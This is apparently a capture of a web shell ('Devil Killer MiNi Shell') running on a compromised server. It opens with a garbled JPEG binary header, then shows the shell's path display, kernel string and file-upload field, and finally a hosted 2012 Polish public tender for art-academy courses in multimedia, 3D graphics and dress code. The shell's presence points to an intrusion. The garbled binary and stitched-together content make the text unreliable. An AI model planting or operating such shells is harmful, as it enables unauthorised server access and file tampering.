JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/113916-N-2012.html

<p class="kh_header"><b>Łódź: Przeprowadzenie wykładów i ćwiczeń w zakresie kursu Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji oraz kursu Dress Code kadry menedżerskiej w ramach projektu Kwalifikacje i wiedza to nasza broń kobieca</b><br>
<b>Numer ogłoszenia: 113916 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi , ul. Wojska Polskiego 121, 91-726 Łódź, woj. łódzkie, tel. 042 2547408, centrala 2547598, faks 042 2547418.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie wykładów i ćwiczeń w zakresie kursu Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji oraz kursu Dress Code kadry menedżerskiej w ramach projektu Kwalifikacje i wiedza to nasza broń kobieca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu:
I.	Kursu w zakresie: 
Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji
Cz. 1	Przeprowadzenie wykładów Podstawy technologii multimedialnej 

Cz. 2	
Przeprowadzenie wykładów Podstawy grafiki i animacji 3D  
Cz. 3	
Przeprowadzenie  ćwiczeń z zakresu Zaawansowane techniki modelowania i animacji 3D
Cz.4	Przeprowadzenie  ćwiczeń z zakresu VFX, postprodukcja i efekty specjalne
Cz. 5	Przeprowadzenie wykładów z zakresu: Projektowanie interaktywnych prezentacji i wydawnictw multimedialnych
Cz. 6	Przeprowadzenie  ćwiczeń z zakresu: Podstawa cyfrowej obróbki obrazu 
Cz.7	Przeprowadzenie  ćwiczeń z zakresu: Korekcja i retusz reklamowy
II.	Kursu Dress code kadry menedżerskiej, w zakresie:
Cz. 8	Przeprowadzenie wykładów i ćwiczeń z zakresu: Dress code - ubiór korporacyjny, typy sylwetek, ubiór w filmowym kadrze - psychologia koloru, tendencje w modzie

Cz. 9	Przeprowadzenie ćwiczeń pt. Makijaż jako narzędzie kreacji wizerunku
Cz. 10	
Przeprowadzenie wykładów i ćwiczeń z zakresu obsługi spotkań biznesowych, etapów prowadzenia i organizacji spotkań biznesowych, zasad profesjonalnej obsługi klientów, etykiety, etykiety, zasad savoir vivre w życiu zawodowym

Cz. 11	Przeprowadzenie sesji fotograficznej Typy kadrowania fotografii - który profil jest lepszy

Cz. 12	Przeprowadzenie wykładów i ćwiczeń nt. Moda przemija, styl pozostaje

Cz. 13	Przeprowadzenie wykładów i ćwiczeń z zakresu nt. Z modą przez xx wiek
2. Termin realizacji
Planowany termin realizacji przedmiotu zamówienia: od 28 kwietnia 2012r. do 31 października 2012r. Wykłady-ćwiczenia w ramach poszczególnych kursów odbywać się będą równolegle tj. w tych samych dniach i godzinach (w soboty i niedziele, rozpoczęcie zajęć w godzinach porannych). Plan zajęć zostanie przygotowany i przedstawiony Wykonawcy przed rozpoczęciem realizacji przedmiotu zamówienia. 

3. Miejsce 
Wykłady i ćwiczenie odbywać się będą w siedzibie Akademii Sztuk Pięknych im. Wł. Strzemińskiego w Łodzi przy ul. Wojska Polskiego 121 oraz poza siedzibą Zamawiającego na terenie Łodzi.

4. Grupa docelowa 
Kursy kierowane są do:
-	kobiet w wieku 18 - 60 lat,
-	mieszkających lub pracujących na terenie województwa łódzkiego, 
-	zgłaszających się do projektu z własnej inicjatywy, 
-	zatrudnionych na stanowisku menedżerskim (kadra średniego szczebla kierowniczego) w obszarze informatycznym, medialnym lub reklamowym lub posiadających pisemne oświadczenie pracodawcy o możliwości awansu na stanowisko menedżerskie (kadra średniego szczebla kierowniczego) 
w obszarze informatycznym, medialnym lub reklamowym,
-	legitymujących się wykształceniem średnim lub wyższym. 


5. OPIS KURSÓW

1) Kurs w zakresie: Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje w zakresie projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa. Kurs jest skierowany również do kobiet, które chcą zwiększyć swoje kwalifikacje w wyżej wymienionych dziedzinach autokreacji projektowej.

Szkolenie odbywać się będzie w podziale na 4 grupy po 16 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach projektowania multimediów, kreacji grafiki i animacji 3D oraz wizerunku przedsiębiorstwa.  

2) Kurs Dress code kadry menedżerskiej
Szkolenie adresowane jest do kobiet sprawujących kierownicze stanowiska w obszarze informatycznym, medialnym oraz reklamowym chcących zwiększyć swoje kwalifikacje 
w zakresie kreowania profesjonalnego wizerunku oraz autoprezentacji - Dress Code kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety. 

Szkolenie odbywać się będzie w podziale na 8 grup po 8 osób. 

Celem kursu jest nabycie przez słuchaczki wiedzy niezbędnej do sprawowania kierowniczych stanowisk w obszarach budowania profesjonalnego wizerunku firmy, autoprezentacji (Dress Code) kadry menedżerskiej, zasad profesjonalnej obsługi klienta, obsługi spotkań biznesowych, netykiety.

6. Zaoferowana przez Wykonawcę cena jest ceną za 1 godzinę dydaktyczną (45 min).
W cenie oferty Wykonawca uwzględnia wszelkie koszty związane z przeprowadzeniem wykładu - ćwiczeń, w szczególności koszty opracowania materiałów szkoleniowych, koszty podróży oraz hotelu Wykładowcy.

Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 7 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I.   Kurs w zakresie:Wykorzystanie technologii multimedialnych oraz animacji i grafiki 3D w projektowaniu prezentacji i autokreacji

Część 1 Przeprowadzenie wykładów Podstawy technologii multimedialnej 
Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:

- minimum 3 letnim doświadczeniem w pracy dydaktycznej na poziomie akademickim,
-minimum 3 letnim doświadczeniem w prowadzeniu zajęć dydaktycznych z zakresu; podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, post produkcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy ,filmu i gier komputerowych, 
-opracowaniem programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów
-opublikowanymi bądź będącymi w fazie przygotowania (umowa z wydawnictwem) publikacji oraz opracowań monograficznych (książki) z zakresu grafiki 3D, animacji  komputerowej, multimediów, motion design, post produkcyjnych efektów specjalnych - minimum dwoma zrealizowanymi w okresie ostatnich 3 latach komercyjnymi projektami multimedialnymi (filmy reklamowe z zastosowaniem animacji 3D, prezentacje multimedialne, wizualizacje komputerowe)

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 6 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 2 Przeprowadzenie wykładów nt Podstawy grafiki i animacji 3D  
Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:
- minimum 3 letnim doświadczeniem w pracy dydaktycznej na poziomie akademickim,
-minimum 3 letnim doświadczeniem w prowadzeniu zajęć dydaktycznych z zakresu; podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, post produkcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy ,filmu i gier komputerowych, 
-opracowaniem programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów
-opublikowanymi bądź będącymi w fazie przygotowania (umowa z wydawnictwem) publikacji oraz opracowań monograficznych (książki) z zakresu grafiki 3D, animacji  komputerowej, multimediów, motion design, post produkcyjnych efektów specjalnych 
- minimum dwoma zrealizowanymi w okresie ostatnich 3 latach komercyjnymi projektami multimedialnymi (filmy reklamowe z zastosowaniem animacji 3D, prezentacje multimedialne, wizualizacje komputerowe)

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 6 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 3 Przeprowadzenie  ćwiczeń z zakresu Zaawansowane techniki modelowania i animacji 3D 
Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:
- minimum 3 letnim doświadczeniem w pracy dydaktycznej na poziomie akademickim,
- minimum 3 letnim doświadczeniem w prowadzeniu zajęć dydaktycznych z zakresu; podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, post produkcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy ,filmu i gier komputerowych, 
-opracowaniem programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów
-opublikowanymi bądź będącymi w fazie przygotowania (umowa z wydawnictwem) publikacji oraz opracowań monograficznych (książki) z zakresu grafiki 3D, animacji  komputerowej, multimediów, motion design, post produkcyjnych efektów specjalnych - minimum dwoma zrealizowanymi w okresie ostatnich 3 latach komercyjnymi projektami multimedialnymi (filmy reklamowe z zastosowaniem animacji 3D, prezentacje multimedialne, wizualizacje komputerowe)

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 6 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 4 Przeprowadzenie ćwiczeń z zakresu VFX, postprodukcja i efekty specjalne
Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:
minimum 3 letnim doświadczeniem w pracy dydaktycznej na poziomie akademickim,
-minimum 3 letnim doświadczeniem w prowadzeniu zajęć dydaktycznych z zakresu; podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, post produkcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy ,filmu i gier komputerowych, 
-opracowaniem programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów
-opublikowanymi bądź będącymi w fazie przygotowania (umowa z wydawnictwem) publikacji oraz opracowań monograficznych (książki) z zakresu grafiki 3D, animacji  komputerowej, multimediów, motion design, post produkcyjnych efektów specjalnych - minimum dwoma zrealizowanymi w okresie ostatnich 3 latach komercyjnymi projektami multimedialnymi (filmy reklamowe z zastosowaniem animacji 3D, prezentacje multimedialne, wizualizacje komputerowe)
Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 6 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.


Część 5 Przeprowadzenie wykładów z zakresu Projektowanie interaktywnych prezentacji i wydawnictw multimedialnych 
Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:

-	minimum 3 realizacje internetowych i graficznych projektów reklamowych (witryny internetowe, banery, grafika wydawnicza) 
-	prowadzeniem szkolenia lub kursu w zakresie tematu dotyczącego niniejszego szkolenia
Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 6 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 6 Przeprowadzenie ćwiczeń z zakresu Podstawa cyfrowej obróbki obrazu 
Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:
-	minimum 3 realizacje internetowych i graficznych projektów reklamowych (witryny internetowe, banery, grafika wydawnicza) 
-	prowadzeniem szkolenia lub kursu w zakresie tematu dotyczącego niniejszego szkolenia 
Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 6 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 7 Przeprowadzenie ćwiczeń z zakresu Korekcja i retusz reklamowy  
Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:

-	minimum 3 realizacje internetowych i graficznych projektów reklamowych (witryny internetowe, banery, grafika wydawnicza) 
-	prowadzeniem szkolenia lub kursu w zakresie tematu dotyczącego niniejszego szkolenia 

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 6 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.


Kurs Dress code kadry menedżerskiej

Część 8 Przeprowadzenie wykładów i ćwiczeń z zakresu: Dress code - ubiór korporacyjny, typy sylwetek, ubiór w filmowym kadrze - psychologia koloru, tendencje w modzie
Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:

- minimum 3 letnie doświadczenie w pracy dydaktycznej w uczelni artystycznej,
- współpraca z minimum 5 firmami na stanowisku projektanta,
- opracowanie i poprowadzenie szkolenia z zakresu ubioru, mody czy tendencji w modzie,
- przeprowadzenie minimum 7 stylizacji (w tym do katalogów, magazynów, sesji zdjęciowych, pokazów mody)
- działalnością badawczą w zakresie Dress Code.

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 3 do siwz. 
	
Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 9 Przeprowadzenie ćwiczeń Pt. Makijaż jako narzędzie kreacji wizerunku

Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:
- minimum 3 zlecenia wykonywania makijażu, charakteryzacji przy produkcji filmowej,
- minimum 10 zleceń wykonywania makijażu, charakteryzacji przy kampaniach reklamowych telewizyjnych oraz przy sesjach reklamowych,
- minimum 10 zleceń wykonywania makijażu, charakteryzacji przy sesjach zdjęciowych dla firm odzieżowych,
- minimum 10 zleceń przy kreowaniu wizerunku osoby publicznej ze świata rozrywki, filmu, polityki.

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 3 do siwz. 
	
Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 10 Przeprowadzenie wykładów i ćwiczeń z zakresu obsługi spotkań biznesowych, etapów prowadzenia i organizacji spotkań biznesowych, zasad profesjonalnej obsługi klientów, etykiety, netykiety, zasad savoir vivre w życiu zawodowym

Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:

Dorobek zawodowy obejmujący:
-	doświadczenie w prowadzeniu szkoleń, warsztatów, treningów
-	doświadczenie w prowadzeniu coachingów warsztatowych
-	doświadczenie w prowadzeniu coachingów rozwojowych dla kadry menadżerskiej
-	przygotowywanie projektów, programów szkoleniowych 

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 3 do siwz. 
	
Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 11. Przeprowadzenie sesji fotograficznej nt Typy kadrowania fotografii - który profil jest lepszy

Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:

- zrealizowanie minimum 10 sesji zdjęciowych dotyczących kolekcji mody lub biżuterii bądź zdjęć reklamowych nt kolekcji mody (łącznie),
- zrealizowanie sesji zdjęciowych do minimum 3 magazynów/gazet bądź portali internetowych (łącznie).

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 3 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.

Część 12. Przeprowadzenie wykładów i ćwiczeń nt. Moda przemija, styl pozostaje

Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:

 Dorobek zawodowy obejmujący:
- publikowanie artykułów o modzie w wydawnictwach modowych, 
- min. 1 publikację książki o modzie,
- prowadzenie szkoleń i warsztatów z zakresu wdzięku, stylu,
- współtworzenie i prowadzenie programów telewizyjnych dla kobiet.

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 3 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.


Część 13. Przeprowadzenie wykładów i ćwiczeń nt. Z modą przez xx wiek

Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:

 Dorobek zawodowy obejmujący:

-  minimum 5 wystąpień na różnego rodzaju konferencjach bądź w środkach masowego przekazu nt. mody, kostiumów teatralnych, filmowych.
- prowadzenie wykładów nt. historii ubioru

Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 3 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1	1.	Przeprowadzenie wykładów z zakresu Podstawy technologii multimedialnej	Jednego wykładowcę posiadającego:
- minimum tytuł magistra, 
- minimum 3-letnie doświadczenie w pracy dydaktycznej na poziomie akademickim,
- minimum 3-letnie doświadczenie w prowadzeniu zajęć dydaktycznych z zakresu: podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, post produkcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy, filmu i gier komputerowych,
- opracowanie programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów.
2	2 Przeprowadzenie wykładów z zakresu Podstawy grafiki i animacji 3D	Jednego wykładowcę posiadającego
- minimum tytuł magistra 
- minimum 3-letnie doświadczenie w pracy dydaktycznej na poziomie akademickim,
- minimum 3-letnie doświadczenie w prowadzeniu zajęć dydaktycznych z zakresu: podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, post produkcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy, filmu i gier komputerowych,
- opracowanie programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów.
3	3. Przeprowadzenie ćwiczeń z zakresu Zaawansowane techniki modelowania i animacji 3D Dwóch wykładowców posiadających: 
- minimum tytuł magistra 
- minimum 3-letnie doświadczenie w pracy dydaktycznej na poziomie akademickim,
- minimum 3-letnie doświadczenie w prowadzeniu zajęć dydaktycznych z zakresu: podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, post produkcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy, filmu i gier komputerowych,
- opracowanie programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów
4	4. Przeprowadzenie ćwiczeń z zakresu VFX, postprodukcja i efekty specjalne Dwóch wykładowców posiadających:
- minimum tytuł magistra,
- minimum 3-letnie doświadczenie w pracy dydaktycznej na poziomie akademickim,
- minimum 3-letnie doświadczenie w prowadzeniu zajęć dydaktycznych z zakresu: podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, post produkcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy, filmu i gier komputerowych,
- opracowanie programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów
